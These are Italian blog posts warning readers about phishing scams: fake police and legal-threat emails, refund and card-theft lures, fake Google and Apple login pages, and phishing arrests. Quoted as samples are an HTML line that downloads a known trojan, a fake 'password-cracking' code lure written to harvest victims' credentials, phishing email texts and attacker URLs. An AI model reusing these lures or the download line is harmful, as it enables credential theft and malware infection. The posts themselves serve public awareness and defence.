Vai al contenuto
Allerta in Svizzera per false mail della polizia federale

Allerta in Svizzera per false mail della polizia federale

Questo articolo vi arriva gratuitamente e senza pubblicità grazie alle donazioni dei lettori. Se vi piace, potete incoraggiarmi a scrivere ancora (anche con un microabbonamento). Ultimo aggiornamento: 2016/01/21 21:55.

Se ricevete una mail come quella qui accanto, apparentemente proveniente dalla Polizia Federale svizzera, come sta succedendo da qualche giorno a molti utenti che hanno un indirizzo di e-mail .ch, cestinatela senza cliccare sui suoi link: è una trappola.

Anche se il suo testo in tedesco parla di un procedimento legale al quale bisogna replicare entro quindici giorni, si tratta infatti di una messinscena architettata da truffatori: la polizia non c’entra nulla (lo si nota dall’indirizzo del mittente, che non è delle autorità svizzere) e anzi ha messo in guardia gli utenti attraverso i media.

Chi la cestina senza cliccare sui suoi link non dovrebbe correre rischi: chi invece cade nella trappola e clicca sui link viene portato, secondo quanto riferisce la Polizia Cantonale, a una pagina Web nella quale, se si immette il numero di riferimento riportato nel messaggio “si scarica, molto probabilmente, un programma malevolo”.

Nel campione che ho esaminato io, i link portavano a un sito russo (lider07.ru) che al momento in cui scrivo effettua un redirect alla pagina di login di Google che non sembra particolarmente ostile (non è una finta pagina di login, fra l’altro). Può darsi che il redirect sia stato impostato da qualcuno per neutralizzare la campagna di e-mail truffaldine, o che nella pagina di login di Google ci sia del codice ostile in più: in ogni caso è meglio lasciar perdere cestinando il messaggio.

Nel frattempo ho segnalato a Netcraft il link contenuto nella mail truffaldina, per cui chi usa la barra anti-phishing di Netcraft verrà allertato se per caso clicca sui link.

Fonti: Giornale del Popolo, RSI, Tio.ch, TicinoNews.

Scritto da Paolo Attivissimo per il blog Il Disinformatico. Ripubblicabile liberamente se viene inclusa questa dicitura (dettagli). Sono ben accette le donazioni Paypal.

Sicurezza: minacce legali da Pro.Sat.Studio, ma è il solito tranello virale

Questo articolo vi arriva grazie alle gentili donazioni di “fabio.degius****” e “emc2”.

Come altri lettori, anch’io stamattina ho ricevuto un’inquietante diffida, piena di errori di battitura, da una certa Simona Favini della Pro.Sat.Studio:

la scrivente società ha senganlato la presenza di continui tentativi di intrusione nei nostri Database dall’inizrizzo di posta topone@pobox.com, siete pregati di controllare lo stato di attivazione della vostra mail all’interno dei nostri archivi all’indirizzo sottostante, la mancata comunicazione all’internio del nostro sito ci vedrà costretti ad intreprendere vie legali

DETTAGLIO EMAIL: topone@pobox.com

Sistinti Saluti
PRO.SAT. STUDIO

Non rispondete a questo messaggio e non cliccate sul link che contiene: è una trappola.

Le parole “Dettaglio email [indirizzo], infatti, portano all’indirizzo http://www.melagodo.biz/prosat_db. Melagodo.biz è un noto sito-trappola, già documentato in altre occasioni in questo blog.

Visitando l’indirizzo del link (non fatelo), che fra l’altro è già bloccato dalla barra antiphishing di Netcraft, compare una scritta che parla di un “Accesso Datatbase PRO.SAT. STUDIO”. Non sembra succedere nulla, ma c’è una riga di codice molto particolare nell’HTML della pagina:

<"clsid:4F398B32-702D-4582-BFA0-F7052FC6A744" codebase="db_access.exe">

Sui sistemi Windows non adeguatamente protetti, questa riga può scaricare e tentare di eseguire un programma, db_access.exe, che l’analisi online di Kaspersky riconosce già come virus, denominandolo Trojan.Win32.Dialer.jw.

Per prevenire attacchi di questo genere, ricordate di non fidarvi mai dei link presenti nei messaggi inattesi e di fonte sconosciuta; ricordate che il mittente di un messaggio è facilmente falsificabile; e prendete opportune precauzioni, usando un antivirus ma soprattutto navigando con browser meno insicuri del solito Internet Explorer (per esempio Firefox o Opera) e con sistemi operativi meno vulnerabili di Windows.

Questo attacco ha efficacia soltanto sui sistemi Windows; gli utenti Mac e Linux e in generale di altri sistemi operativi non corrono rischi.

Se avete cliccato sul link e temete di essere infetti, non scrivetemi chiedendo aiuto: purtroppo non ho tempo per fare assistenza tecnica a tutti. Contattate uno specialista, pagatelo per disinfestare e cogliete l’occasione per riflettere sulle vostre abitudini informatiche.

Se non avete cliccato sul link, cestinate il messaggio e non preoccupatevi.

Scritto da Paolo Attivissimo per il blog Il Disinformatico. Ripubblicabile liberamente se viene inclusa questa dicitura (dettagli). Sono ben accette le donazioni Paypal.

Come trovare la password di MSN e Hotmail: il metodo funziona. Ma non come promesso

Questo articolo vi arriva grazie alle gentili donazioni di “17262” e “clauslucas”.

IMPORTANTE

Prima di scrivermi chiedendo come usare questo metodo per scoprire la password della vostra morosa che temete vi faccia le corna, del vostro capo che vi tormenta, o del vostro cane, leggete fino in fondo l’articolo.

Ricevo da un paio di giorni segnalazioni di una tecnica di phishing decisamente originale: un e-mail che promette un “metodo funzionante per trovare la password di un account MSN o Hotmail”.

L’e-mail contiene il listato top secret di un programma nel quale si devono immettere alcuni dati prima di inviarlo a un particolare indirizzo di posta, dal quale si riceverà in risposta la password che si voleva scoprire.

Ecco un esempio del messaggio:

ATTENZIONE
ECCO IL METODO FUNZIONANTE PER TROVRE LA PASSWORD DI UN ACCOUNT MSN O HOTMAIL
INVIERO’ QUESTA EMAIL SOLO A 10 PERSONE, PER NON MINARE LA SICUREZZA DI TUTTI, SOPRATTUTTO DELLA GENTE ONESTA….RITIENITI FORTUNATO

USA QUESTO SISTEMA SOLO PER COSE SERIE TIPO SE SEI STATO TRUFFATO O COSE SIMILI……
……SE CERCHI GIUSTIZIA.……

SE FAI CASINI PERO’ SONO SOLO AFFARI TUOI!!!!!

SPIEGAZIONE: INVIA IL CODICE SEGUENTE ALL’INDIRIZZO EMAIL (fai “copia e incolla”)

msn_server0018_command_root@hotmail.it

FAI LE OPPORTUNE MODIFICHE INDICATE IN ROSSO

#ifndef SPSTRING
#define SPSTRING
//#define ASK //INSERISCI IL TUO INDIRIZZO EMAIL QUI (non ha importanza a quale dominio appartiene, funziona con tutti)
//#define ASK //INSERISCI LA PASSWORD DEL TUO INDIRIZZO EMAIL QUI
//#define ASK //INSERISCI DINUOVO LA PASSWORD DEL TUO INDIRIZZO EMAIL QUI
#include <iostream.h></iostream.h>
#include <assert.h></assert.h>
#include <stdlib.h></stdlib.h>
#include <string.h></string.h>
#include <stdio.h></stdio.h>
#define DEFAULT_ALLOC 16
#define MAXLENGTH 1024

class StringTokenizer;
class String
{
friend class StringTokenizer;
protected:
unsigned len; //actual length of string
unsigned sz; //allocated length
char *s; //where the actual chars are stored.
enum {MaxLength=MAXLENGTH};
public:
String();
String(int n);
String(char *t);
String::String(int n, char c);
String(const String&);
~String();
String& operator= INSERISCI L’INDIRIZZO EMAIL DI CUI VUOI IDENTIFICARE LA PASSWORD
String& operator=(const char *);
char & operator[](unsigned i);
const char & operator[](unsigned i) const;
//conversion of numbers to strings
void ConvertInt(int i);
void ConvertDouble(double d);
//conversion of strings to numbers
double Double(void);
long Long(void);
int Int();
char * chars();
//returns the actual char_string
// unsigned Unsigned(void);

//IO
friend istream& operator>>(istream& InStream, String& S);
friend ostream& operator<<(ostream& OutStream,const String& S);
/*

istream& ReadLine(istream& In,char Until=’\n’);
void ReadLine(FILE *fp);
void Print();
//String Operations
int Length()const ;
int Delete(unsigned Start, unsigned End);
int Insert(const String& S,unsigned Start);
int Replace(const String& S,unsigned Start, unsigned End);
int Locate(const String& S) const;
void Replace(const String& Target,const String& Source);
//char * is converted to String, so the next 3 aren’t necessary
void Replace(const String& Target,char * S);
void Replace(char * T,const String& Source);
void Replace(char * T,char * S);

//Concatenate
friend String operator+(const String& S, const String& T);
//char* is converted to String
friend String operator+(const String& S, char *T);
friend String operator+(char *T, const String& S);

int BelongsTo(const char C)const ; //could just use Locate(“C”)
//Comparison operators
friend operator==(const String& S, const String& T);
friend operator==(const String& S, char * T);
friend operator==(char * T, const String& S);
friend operator!=(const String& S, const String& T);
friend operator!=(const String& S, char * T);
friend operator!=(char * T, const String& S);
friend operator<(const String& S, const String& T);
friend operator<(const String& S, char * T);
friend operator<(char * T, const String& S);
friend operator>(const String& S, const String& T);
friend operator>(const String& S, char * T);
friend operator>(char * T, const String& S);
friend operator>=(const String& S, const String& T);
friend operator>=(const String& S, char * T);
friend operator>=(char * T, const String& S);
friend operator<=(const String& S, const String& T);
friend operator<=(const String& S, char * T);
friend operator<=(char * T, const String& S);
//Modify string
void UpperCase();
void LowerCase();
char * CurrentStart;
char *Buffer;
public:
StringTokenizer(const String& Source);
StringTokenizer(int size);
StringTokenizer();
~StringTokenizer();
void ReSet(const String& S);
String Next(const String &);
String Next(char *t);
int Empty();
};
#endif

IL SERVER MSN 0018 INVIERA’ ALLA TUA CASELLA EMAIL TUTTI I DATI DI REGISTRAZIONE E LA PASSWORD DELL’INDIRIZZO EMAIL DA TE PRESCELTO

INVIERO’ QUESTA EMAIL SOLO A 10 PERSONE, PER NON MINARE LA SICUREZZA DI TUTTI, SOPRATTUTTO DELLA GENTE ONESTA….RITIENITI FORTUNATO

L’originalità di questa trappola sta nel suo gioco psicologico: invoglia la vittima a fidarsi nella speranza di ottenere un beneficio illecito (la password della casella postale di qualcun altro) e offre alla vittima il piacere di sentirsi privilegiata e fortunata ad essere una delle poche persone a ricevere questa conoscenza segreta (“invierò questa email solo a 10 persone”… in realtà l’ha ricevuta un sacco di gente).

Inoltre ribalta i ruoli: fa credere a chi la riceve di poter diventare aggressore, quando in realtà diventa vittima. C’è, oserei dire, una certa passione per il contrappasso in questa tecnica.

Il “programma”, infatti, non è un vero programma: è semplicemente un listato di istruzioni senza senso, all’inizio del quale vengono chiesti l’indirizzo di e-mail e la password di chi la riceve. A questa richiesta, però, è facile non dar peso, perché viene mascherata dalla formulazione del programma, da altre richieste d’informazioni e dalla lunghezza del listato del programma.

In altre parole, se abboccate, mandate al proprietario della casella msn_server0018_command_root@hotmail.it la password della vostra casella di posta. L’autore del messaggio-esca potrà così devastarvi la posta a suo piacimento.

Al momento in cui scrivo, l’indirizzo sembra valido e tuttora attivo, per cui si presume che stia ancora raccogliendo le password di chi è caduto nella trappola.

Se volete fermarlo, mandategli dati fasulli a pioggia: seguite insomma le istruzioni, ma immettete una password errata nel “programma” prima di spedirlo. L’aggressore dovrà perdere tempo a verificare la validità di ogni messaggio ricevuto, per cui i messaggi contenenti password vere saranno dispersi all’interno di una marea di falsi. Un’altra tecnica di contrasto consigliabile è scrivere al servizio abusi di Hotmail (le coordinate sono su Hotmail.it).

Scritto da Paolo Attivissimo per il blog Il Disinformatico. Ripubblicabile liberamente se viene inclusa questa dicitura (dettagli). Sono ben accette le donazioni Paypal.
Siete utenti Cablecom? Occhio alle mail che promettono rimborsi

Siete utenti Cablecom? Occhio alle mail che promettono rimborsi

Questo articolo vi arriva grazie alla gentile donazione di “nicola.rom*” e alla segnalazione di “kayott*”.

Se siete utenti di Cablecom (provider Internet e TV via cavo svizzero), fate attenzione alle mail che annunciano un rimborso e che invitano a cliccare su un link per ricevere il denaro.

Il link porta a quella che sembra essere una pagina del sito Cablecom che chiede i dati della carta di credito del “beneficiario” del presunto rimborso, ma in realtà risiede altrove (presso Til-nets.com) ed è presumibilmente controllata dai truffatori che stanno inviando le mail.

Questo è un campione delle mail in questione (scam):

Sehr geehrter Kunde,

Nach den neuesten Berechnungen des Einkommens Steuern, haben wir festgestellt, dass Sie Anspruch auf eine
Rückerstattung von uns für einen Betrag von 165.00 CHF zu erhalten sind.

Was sind die Schritte, um für mein Rückerstattung folgen?

Eine Rückerstattung kann aus verschiedenen Gründen verzögert werden. Zum Beispiel die Vorlage ungültige
Datensätze oder die Anwendung nach Ablauf der Frist.

Wir bitten Sie, Ihre Bankdaten aktualisieren, so dass ihre Rückerstattung so bald wie möglich gemacht werden,
und Sie erlauben uns 3 Arbeistage, um Ihre Situation zu verarbeiten.

Ich schaue mir die Schritte zu folgen >>

Aus Gründen der Sicherheit und der Privatsphäre, ist dieser Link zur Einzelnutzung und einer Dauer von 48 Stunden.

Vielen Dank und akzeptieren Sie bitte, Frau, Herr, Mit freundlichen Grüssen.

Una volta immessi i dati nel sito fasullo, la vittima viene portata al sito vero di Cablecom, col rischio di non accorgersi neppure di aver dato i propri codici a un truffatore.

Ho già segnalato a Netcraft il sito di phishing. Se ricevete questo genere di mail, cancellatela senza seguire eventuali link contenuti nel messaggio.

Mi sto chiedendo se potrebbe valere la pena di saturare il sito di phishing immettendogli dati fasulli ma credibili. Avrebbe il vantaggio di annacquare il database dei criminali. Qualcuno ha voglia di scrivere un’app o qualcosa del genere per automatizzare il processo?

Scritto da Paolo Attivissimo per il blog Il Disinformatico. Ripubblicabile liberamente se viene inclusa questa dicitura (dettagli). Sono ben accette le donazioni Paypal.

Impressionante successo del phishing: abboccano in troppi

Molti pensano che gli attacchi informatici siano frutto di chissà quali astuzie, ma in realtà gran parte delle incursioni ha successo per via dell’impreparazione delle vittime anche nei confronti delle tecniche d’attacco più banali e classiche.

Un rapporto dell’operatore cellulare statunitense Verizon, intitolato Data Breach Investigations Report, ha analizzato con l’aiuto di esperti del settore ben 80.000 incidenti di sicurezza e 2000 intrusioni in vari paesi del mondo. Fra i tanti dati presentati dal rapporto spicca il numero di attacchi basati sul phishing (l’invio di mail false che simulano mittenti attendibili e includono allegati ostili o link a siti che imitano le pagine d’immissione password dei siti più diffusi): i due terzi dei casi di spionaggio informatico è riconducibile a questa tecnica elementare.

Infatti un’analisi di 150.000 mail di phishing ha indicato che il 23% dei destinatari apre questi messaggi-trappola e l’11% apre anche gli allegati. Il tasso d’ingenuità è insomma inquietante, specialmente in ambienti di lavoro e di governo che trattano dati sensibili e informazioni vitali.

Non solo: in media, dal momento in cui viene inviata una bordata di messaggi-trappola al momento in cui la prima vittima abbocca passano ottantadue secondi, e il 50% delle vittime apre gli allegati o clicca sui link-trappola in meno di un’ora, ossia prima che i responsabili dei sistemi informatici possano intervenire sul problema.

L’unico modo per contenere questo bagno di sangue è educare gli utenti a diffidare dei messaggi che invitano a cliccare su un link o ad aprire un allegato, anche se sembrano provenire da mittenti attendibili. Se sono sgrammaticati o non sono personalizzati, è meglio cestinarli direttamente; un controllo degli allegati con un antivirus aggiornato è sempre consigliabile, e i link vanno esaminati per vedere se portano a siti diversi da quelli dichiarati.

Scritto da Paolo Attivissimo per il blog Il Disinformatico. Ripubblicabile liberamente se viene inclusa questa dicitura (dettagli). Sono ben accette le donazioni Paypal.
Se il sito del Comune ospita i ladri di carte di credito

Se il sito del Comune ospita i ladri di carte di credito

Questo articolo vi arriva grazie alla gentile donazione di “vano.m*” e “grvnoc”.

Poco fa mi è arrivata questa simpatica mail di phishing:

Gli ingredienti sono classici: il mittente falsificato bene (sembra provenire da CartaSi_Informa@cartasi.it), il logo imitato, il testo un po’ dilettantesco ma facilmente credibile. Quello che è differente e interessante è il link-trappola: le parole “cliccando qui” infatti linkano un URL del sito del Comune di Borgosatollo (BS). L’URL è questo (che ho spezzato per non influenzare pagerank e non finire nell’elenco dei phisher):

http://www.comune.borgo satollo.bs.it/control panel/uploads/index

Cliccando sul link con un browser sicuro (non fatelo) si viene portati a un altro sito interessante:

http://www.teatrodel canguro.it/public/client uploadfile/beta/cartasii.it

che ospita questa schermata:

Immettendo dati (ovviamente fasulli) nella schermata si viene portati alla classica richiesta dei dati della carta di credito:

Io ho segnalato i due siti a Netcraft affinché diffonda l’allerta phishing e li blocchi. Ci pensate voi ad avvisare i responsabili del Comune di Borgosatollo che si sono fatti bucare il sito e che non è carino che un sito della pubblica amministrazione ospiti dei ladri di carte di credito?

Scritto da Paolo Attivissimo per il blog Il Disinformatico. Ripubblicabile liberamente se viene inclusa questa dicitura (dettagli). Sono ben accette le donazioni Paypal.
Occhio ai siti che usano Google per rubare password

Occhio ai siti che usano Google per rubare password

La falsa schermata di login
(credit: Symantec)

L’articolo è stato aggiornato dopo la pubblicazione iniziale.

Una delle tecniche più diffuse e classiche per rubare le password è il cosiddetto phishing: la vittima riceve una mail, proveniente da un mittente apparentemente credibile, che contiene un invito a cliccare su un link allo scopo di aggiornare i propri dati o recuperare un account bloccato o altre scuse analoghe. Il link porta in realtà a un sito falso, gestito dai ladri di password, che assomiglia visivamente al sito autentico relativo all’account: immettendovi la password, la vittima la regala ai ladri.

La difesa è altrettanto classica: guardare la destinazione del link, per esempio lasciando fermo il puntatore del mouse sopra il link per qualche istante oppure (soluzione meno preferibile) cliccando sul link e guardando se nella barra dell’indirizzo compare un lucchetto chiuso insieme all’indicazione “https” e al nome esatto del sito di cui è stata chiesta la password.

Questo di solito è sufficiente, ma di recente è stato segnalato da Symantec un caso di phishing per il quale questa difesa non basta. Infatti è in circolazione un tentativo di rubare le password degli account Google che arriva, come consueto, sotto forma di una mail proveniente apparentemente da Google e contenente il solito link-trappola, con la differenza che stavolta il link ingannevole porta a Google.

I ladri di password, infatti, hanno creato in Google Drive una pagina che imita l’aspetto della schermata di login di Google, che è quello che l’utente tipicamente si aspetta di vedere. Essendo ospitata su Google, la pagina visualizza il lucchetto chiuso e l’https che solitamente garantiscono l’autenticità del sito visitato. Se l’utente abbocca e immette la propria password, viene poi portato a un documento Google normalissimo, per cui è possibile che non si accorga neanche di essere stato ingannato dai ladri.

Qualunque buon antivirus dovrebbe proteggere contro questo genere di trappola, ma è meglio comunque essere vigili:

  1. Diffidate sempre delle mail che vi chiedono di cliccare su un link per accedere a un account per qualunque ragione e usano un testo molto generico.
  2. Se le ricevete, cestinatele senza pietà.
  3. Se volete essere sicuri di non aver cestinato un messaggio autentico, accedete manualmente al sito citato nella mail (digitandone il nome o cliccando sui Preferiti se l’avete incluso fra i Preferiti) per vedere se c’è davvero una comunicazione da parte del sito: se non c’è, vi siete appena salvati da un tentativo di furto di password.
Scritto da Paolo Attivissimo per il blog Il Disinformatico. Ripubblicabile liberamente se viene inclusa questa dicitura (dettagli). Sono ben accette le donazioni Paypal.
Phishing contro utenti Apple in tempo reale: un caso pratico

Phishing contro utenti Apple in tempo reale: un caso pratico

Questo articolo vi arriva grazie alla gentile donazione di “botte32” e “diegoca*” ed è stato aggiornato dopo la pubblicazione iniziale.

Se ci sono in giro tante truffe, in parte è colpa dei responsabili dei siti regolari che non vigilano sulla propria sicurezza. Un lettore, Marco P., mi segnala il caso di due siti, Atelierlazzaro.com (italiano) e Sparkmotorsports.com (di Singapore), che ospitano un attacco probabilmente senza saperlo.

L’attacco inizia con una mail come questa: una mail apparentemente proveniente da un account di servizio Apple (apple-servizzi@apple.it). In realtà si tratta di un semplice account di un utente comune il cui nome è stato scelto per sembrare un account amministrativo. La doppia Z di servizzi dovrebbe essere un indizio rivelatore (insieme alla sgrammaticatura generale del messaggio) che fa capire alla maggior parte degli utenti che si tratta di un account farlocco, ma bisogna tenere presente che questi phishing sono calibrati per prendere di mira gli utenti più sprovveduti: quelli che abboccheranno anche alle fasi successive della trappola.

Se l’utente clicca sull’invito “Clicca qui”, il link lo porta a http://www.atelier [togliere questa parentesi] lazzaro.com/reserved/go.php, che appartiene al sito web di un liutaio italiano, presumibilmente anche lui ignaro di essere stato violato dai truffatori.

Il link del sito del liutaio redirige la vittima su una pagina ospitata (si presume inconsapevolmente) da Sparkmotorsports.com:

http://apple.com-servizzi.spark [togliere questa parentesi] motorsports.com/login/index1.php?command=Botton&Histore=1302cc8a7af8b4ca4c8541e92a92dcb7:

La pagina-trappola effettua un controllo sommario dei contenuti dei campi: esige che quasi tutti i campi siano compilati, ma non verifica la correttezza dei dati immessi, per cui posso inquinare il database dei truffatori con qualche input “personalizzato”.

In caso di dati non corrispondenti a un account Apple esistente, si viene portati a questa pagina:

Ma se i dati immessi sono quelli di un account reale, la vittima regala il controllo del proprio account Apple al truffatore, insieme ai dati della propria carta di credito e ai propri dati anagrafici. Basta che abbocchi qualche persona e il criminale s’è guadagnato la giornata.

Ho allertato il sito del liutaio. Sparkmotorsports.com è chiuso ed è quindi probabilmente inutile allertarlo.

La domanda che mi capita spesso in questi casi è cosa fare: avvisare la polizia? A mio avviso non ne vale la pena ed è poco efficiente. È molto meglio avvisare i siti coinvolti e segnalarli ai servizi di monitoraggio come Netcraft.com o Google (grazie a Luigi Rosa per il link): questo propagherà molto rapidamente la protezione a tutti gli utenti che hanno il buon senso di dotarsi di barre come quella di Netcraft o di DNS che fanno anche blocco degli URL sospetti.

Scritto da Paolo Attivissimo per il blog Il Disinformatico. Ripubblicabile liberamente se viene inclusa questa dicitura (dettagli). Sono ben accette le donazioni Paypal.

Due puntate del DIsinformatico radiofonico

Pronti due podcast del Disinformatico

Come vola il tempo! Domani è già ora di una nuova puntata del Disinformatico radiofonico (alle 11 su ReteTre RSI, ascoltabile anche in diretta in streaming). Intanto segnalo che la puntata del 2 marzo, il cui podcast era rimasto in sospeso, adesso è disponibile qui. Gli argomenti sono questi:

La puntata del 9 marzo è invece scaricabile qui e parla di:

Buon ascolto!

Scritto da Paolo Attivissimo per il blog Il Disinformatico. Ripubblicabile liberamente se viene inclusa questa dicitura (dettagli). Sono ben accette le donazioni Paypal.

Phishing, arresti in Italia

Finalmente manette per il phishing contro Bancoposte

Questo articolo vi arriva grazie alle gentili donazioni di “napstar8” e “hriccobene”.

La Guardia di Finanza di Milano ha messo a segno quelli che definisce i primi arresti per phishing: 26 persone di due associazioni collegate, composte da 18 italiani e otto persone provenienti dall’europa orientale.

Il meccanismo della truffa era quello classico del phishing: uno dei componenti delle organizzazioni mandava migliaia di e-mail fasulle nelle quali si spacciava per il servizio clienti delle Poste italiane e avvisava i clienti (pescati a caso fra gli utenti della Rete) di un problema tecnico che richiedeva la reimmissione dei loro codici segreti d’accesso, effettuabile tramite il link gentilmente fornito nel messaggio. Il link, ovviamente, portava a un sito fotocopia di quello delle Poste e gestito dai delinquenti.

Sono interessanti i dettagli del meccanismo della truffa forniti dal comunicato stampa della GdF: una volta entrati in possesso dei codici di accesso dei conti delle vittime, i truffatori trasferivano i soldi dai conti a delle carte PostePay aperte dai complici. I soldi venivano poi utilizzati per acquistare fiches in diversi casinò in Italia e all’estero.

E’ forse finita l’ora dell’apparente impunità dei phisher: sembrava essere un crimine “pulito” e facile, ma l’illusione è finita. La notizia si è meritata una segnalazione anche all’estero da The Register, anche per via del nome scelto, a quanto pare, per l’operazione: “Phish and Chip”.

Scritto da Paolo Attivissimo per il blog Il Disinformatico. Ripubblicabile liberamente se viene inclusa questa dicitura (dettagli). Sono ben accette le donazioni Paypal.